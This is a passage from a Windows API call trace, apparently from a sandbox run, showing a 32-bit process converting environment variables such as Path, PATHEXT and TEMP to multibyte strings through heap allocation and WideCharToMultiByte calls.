Flags=0x0, MemoryPointer=0x2e1360) returned 0x30 [0117.830] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1360, Size=0x34) returned 0x2e13b8 [0117.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0117.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x17) returned 0x2e1360 [0117.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x2e1360, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0117.830] GetLastError () returned 0x0 [0117.830] SetLastError (dwErrCode=0x0) [0117.830] GetLastError () returned 0x0 [0117.830] SetLastError (dwErrCode=0x0) [0117.830] GetLastError () returned 0x0 [0117.830] SetLastError (dwErrCode=0x0) [0117.830] GetLastError () returned 0x0 [0117.830] SetLastError (dwErrCode=0x0) [0117.830] GetLastError () returned 0x0 [0117.830] SetLastError (dwErrCode=0x0) [0117.830] GetLastError () returned 0x0 [0117.831] SetLastError (dwErrCode=0x0) [0117.831] GetLastError () returned 0x0 [0117.831] SetLastError (dwErrCode=0x0) [0117.831] GetLastError () returned 0x0 [0117.831] SetLastError (dwErrCode=0x0) [0117.831] GetLastError () returned 0x0 [0117.831] SetLastError (dwErrCode=0x0) [0117.831] GetLastError () returned 0x0 [0117.831] SetLastError (dwErrCode=0x0) [0117.831] GetLastError () returned 0x0 [0117.831] SetLastError (dwErrCode=0x0) [0117.831] GetLastError () returned 0x0 [0117.831] SetLastError (dwErrCode=0x0) [0117.831] GetLastError () returned 0x0 [0117.831] SetLastError (dwErrCode=0x0) [0117.831] GetLastError () returned 0x0 [0117.831] SetLastError (dwErrCode=0x0) [0117.831] GetLastError () returned 0x0 [0117.831] SetLastError (dwErrCode=0x0) [0117.831] GetLastError () returned 0x0 [0117.831] SetLastError (dwErrCode=0x0) [0117.831] GetLastError () returned 0x0 [0117.832] SetLastError (dwErrCode=0x0) [0117.832] GetLastError () returned 0x0 [0117.832] SetLastError (dwErrCode=0x0) [0117.832] GetLastError () returned 0x0 [0117.832] SetLastError (dwErrCode=0x0) [0117.832] GetLastError () returned 0x0 [0117.832] SetLastError (dwErrCode=0x0) [0117.832] GetLastError () returned 0x0 [0117.832] SetLastError (dwErrCode=0x0) [0117.832] GetLastError () returned 0x0 [0117.832] SetLastError (dwErrCode=0x0) [0117.832] GetLastError () returned 0x0 [0117.832] SetLastError (dwErrCode=0x0) [0117.832] GetLastError () returned 0x0 [0117.832] SetLastError (dwErrCode=0x0) [0117.832] GetLastError () returned 0x0 [0117.832] SetLastError (dwErrCode=0x0) [0117.832] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e13b8) returned 0x34 [0117.832] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e13b8, Size=0x38) returned 0x2e13b8 [0117.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0117.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe) returned 0x2de780 [0117.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x2de780, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0117.832] GetLastError () returned 0x0 [0117.833] SetLastError (dwErrCode=0x0) [0117.833] GetLastError () returned 0x0 [0117.833] SetLastError (dwErrCode=0x0) [0117.833] GetLastError () returned 0x0 [0117.833] SetLastError (dwErrCode=0x0) [0117.833] GetLastError () returned 0x0 [0117.833] SetLastError (dwErrCode=0x0) [0117.833] GetLastError () returned 0x0 [0117.833] SetLastError (dwErrCode=0x0) [0117.833] GetLastError () returned 0x0 [0117.833] SetLastError (dwErrCode=0x0) [0117.833] GetLastError () returned 0x0 [0117.833] SetLastError (dwErrCode=0x0) [0117.833] GetLastError () returned 0x0 [0117.833] SetLastError (dwErrCode=0x0) [0117.833] GetLastError () returned 0x0 [0117.833] SetLastError (dwErrCode=0x0) [0117.833] GetLastError () returned 0x0 [0117.833] SetLastError (dwErrCode=0x0) [0117.833] GetLastError () returned 0x0 [0117.833] SetLastError (dwErrCode=0x0) [0117.833] GetLastError () returned 0x0 [0117.834] SetLastError (dwErrCode=0x0) [0117.834] GetLastError () returned 0x0 [0117.834] SetLastError (dwErrCode=0x0) [0117.834] GetLastError () returned 0x0 [0117.834] SetLastError (dwErrCode=0x0) [0117.834] GetLastError () returned 0x0 [0117.834] SetLastError (dwErrCode=0x0) [0117.834] GetLastError () returned 0x0 [0117.834] SetLastError (dwErrCode=0x0) [0117.834] GetLastError () returned 0x0 [0117.834] SetLastError (dwErrCode=0x0) [0117.834] GetLastError () returned 0x0 [0117.834] SetLastError (dwErrCode=0x0) [0117.834] GetLastError () returned 0x0 [0117.834] SetLastError (dwErrCode=0x0) [0117.834] GetLastError () returned 0x0 [0117.834] SetLastError (dwErrCode=0x0) [0117.834] GetLastError () returned 0x0 [0117.834] SetLastError (dwErrCode=0x0) [0117.834] GetLastError () returned 0x0 [0117.834] SetLastError (dwErrCode=0x0) [0117.834] GetLastError () returned 0x0 [0117.835] SetLastError (dwErrCode=0x0) [0117.835] GetLastError () returned 0x0 [0117.835] SetLastError (dwErrCode=0x0) [0117.835] GetLastError () returned 0x0 [0117.835] SetLastError (dwErrCode=0x0) [0117.835] GetLastError () returned 0x0 [0117.835] SetLastError (dwErrCode=0x0) [0117.835] GetLastError () returned 0x0 [0117.835] SetLastError (dwErrCode=0x0) [0117.835] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e13b8) returned 0x38 [0117.835] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e13b8, Size=0x3c) returned 0x2e13b8 [0117.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0117.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x69) returned 0x2e1400 [0117.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x2e1400, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0117.835] GetLastError () returned 0x0 [0117.835] SetLastError (dwErrCode=0x0) [0117.835] GetLastError () returned 0x0 [0117.835] SetLastError (dwErrCode=0x0) [0117.835] GetLastError () returned 0x0 [0117.835] SetLastError (dwErrCode=0x0) [0117.835] GetLastError () returned 0x0 [0117.835] SetLastError (dwErrCode=0x0) [0117.835] GetLastError () returned 0x0 [0117.836] SetLastError (dwErrCode=0x0) [0117.836] GetLastError () returned 0x0 [0117.836] SetLastError (dwErrCode=0x0) [0117.836] GetLastError () returned 0x0 [0117.836] SetLastError (dwErrCode=0x0) [0117.836] GetLastError () returned 0x0 [0117.836] SetLastError (dwErrCode=0x0) [0117.836] GetLastError () returned 0x0 [0117.836] SetLastError (dwErrCode=0x0) [0117.836] GetLastError () returned 0x0 [0117.836] SetLastError (dwErrCode=0x0) [0117.836] GetLastError () returned 0x0 [0117.836] SetLastError (dwErrCode=0x0) [0117.836] GetLastError () returned 0x0 [0117.836] SetLastError (dwErrCode=0x0) [0117.836] GetLastError () returned 0x0 [0117.836] SetLastError (dwErrCode=0x0) [0117.836] GetLastError () returned 0x0 [0117.836] SetLastError (dwErrCode=0x0) [0117.836] GetLastError () returned 0x0 [0117.836] SetLastError (dwErrCode=0x0) [0117.836] GetLastError () returned 0x0 [0117.836] SetLastError (dwErrCode=0x0) [0117.836] GetLastError () returned 0x0 [0117.837] SetLastError (dwErrCode=0x0) [0117.837] GetLastError () returned 0x0 [0117.837] SetLastError (dwErrCode=0x0) [0117.837] GetLastError () returned 0x0 [0117.837] SetLastError (dwErrCode=0x0) [0117.837] GetLastError () returned 0x0 [0117.837] SetLastError (dwErrCode=0x0) [0117.837] GetLastError () returned 0x0 [0117.837] SetLastError (dwErrCode=0x0) [0117.837] GetLastError () returned 0x0 [0117.837] SetLastError (dwErrCode=0x0) [0117.837] GetLastError () returned 0x0 [0117.837] SetLastError (dwErrCode=0x0) [0117.837] GetLastError () returned 0x0 [0117.837] SetLastError (dwErrCode=0x0) [0117.837] GetLastError () returned 0x0 [0117.837] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e13b8) returned 0x3c [0117.837] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e13b8, Size=0x40) returned 0x2e13b8 [0117.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0117.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3e) returned 0x2d5908 [0117.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x2d5908, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0117.837] GetLastError () returned 0x0 [0117.837] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e13b8) returned 0x40 [0117.837] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e13b8, Size=0x44) returned 0x2e1478 [0117.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0117.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1b) returned 0x2df1b8 [0117.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x2df1b8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0117.838] GetLastError () returned 0x0 [0117.838] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1478) returned 0x44 [0117.838] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1478, Size=0x48) returned 0x2e1478 [0117.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0117.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1d) returned 0x2df1e0 [0117.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x2df1e0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0117.838] GetLastError () returned 0x0 [0117.838] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1478) returned 0x48 [0117.838] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1478, Size=0x4c) returned 0x2e1478 [0117.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0117.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x48) returned 0x2d6ca0 [0117.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x2d6ca0, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0117.838] GetLastError () returned 0x0 [0117.838] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1478) returned 0x4c [0117.838] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1478, Size=0x50) returned 0x2e1478 [0117.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0117.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x12) returned 0x2e13b8 [0117.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x2e13b8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0117.838] GetLastError () returned 0x0 [0117.838] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1478) returned 0x50 [0117.838] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1478, Size=0x54) returned 0x2e1478 [0117.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0117.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x18) returned 0x2e13d8 [0117.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x2e13d8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0117.839] GetLastError () returned 0x0 [0117.839] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1478) returned 0x54 [0117.839] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1478, Size=0x58) returned 0x2e1478 [0117.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0117.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1b) returned 0x2df208 [0117.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x2df208, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0117.839] GetLastError () returned 0x0 [0117.839] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1478) returned 0x58 [0117.839] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1478, Size=0x5c) returned 0x2e1478 [0117.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0117.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x24) returned 0x2dab60 [0117.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x2dab60, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0117.839] GetLastError () returned 0x0 [0117.839] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1478) returned 0x5c [0117.839] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1478, Size=0x60) returned 0x2e1478 [0117.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0117.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x29) returned 0x2db208 [0117.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x2db208, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0117.839] GetLastError () returned 0x0 [0117.839] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1478) returned 0x60 [0117.839] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1478, Size=0x64) returned 0x2e1478 [0117.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0117.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1e) returned 0x2df230 [0117.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x2df230, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0117.839] GetLastError () returned 0x0 [0117.840] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1478) returned 0x64 [0117.840] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1478, Size=0x68) returned 0x2e1478 [0117.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0117.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x41) returned 0x2d6cf0 [0117.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x2d6cf0, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0117.840] GetLastError () returned 0x0 [0117.840] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1478) returned 0x68 [0117.840] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1478, Size=0x6c) returned 0x2e1478 [0117.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0117.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x17) returned 0x2e14f0 [0117.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x2e14f0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0117.840] GetLastError () returned 0x0 [0117.840] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1478) returned 0x6c [0117.840] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1478, Size=0x70) returned 0x2e1478 [0117.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0117.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf) returned 0x2de798 [0117.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x2de798, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0117.840] GetLastError () returned 0x0 [0117.840] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1478) returned 0x70 [0117.885] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1478, Size=0x74) returned 0x2e1510 [0117.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0117.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x16) returned 0x2e1478 [0117.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x2e1478, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0117.885] GetLastError () returned 0x0 [0117.885] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1510) returned 0x74 [0117.885] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1510, Size=0x78) returned 0x2e1510 [0117.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0117.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2a) returned 0x2db240 [0117.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x2db240, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0117.885] GetLastError () returned 0x0 [0117.885] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1510) returned 0x78 [0117.885] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1510, Size=0x7c) returned 0x2e1510 [0117.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0117.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x29) returned 0x2db278 [0117.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x2db278, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0117.886] GetLastError () returned 0x0 [0117.886] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1510) returned 0x7c [0117.886] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1510, Size=0x80) returned 0x2e1510 [0117.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0117.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x15) returned 0x2e1498 [0117.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x2e1498, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0117.886] GetLastError () returned 0x0 [0117.886] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1510) returned 0x80 [0117.886] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1510, Size=0x84) returned 0x2e1510 [0117.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0117.886] 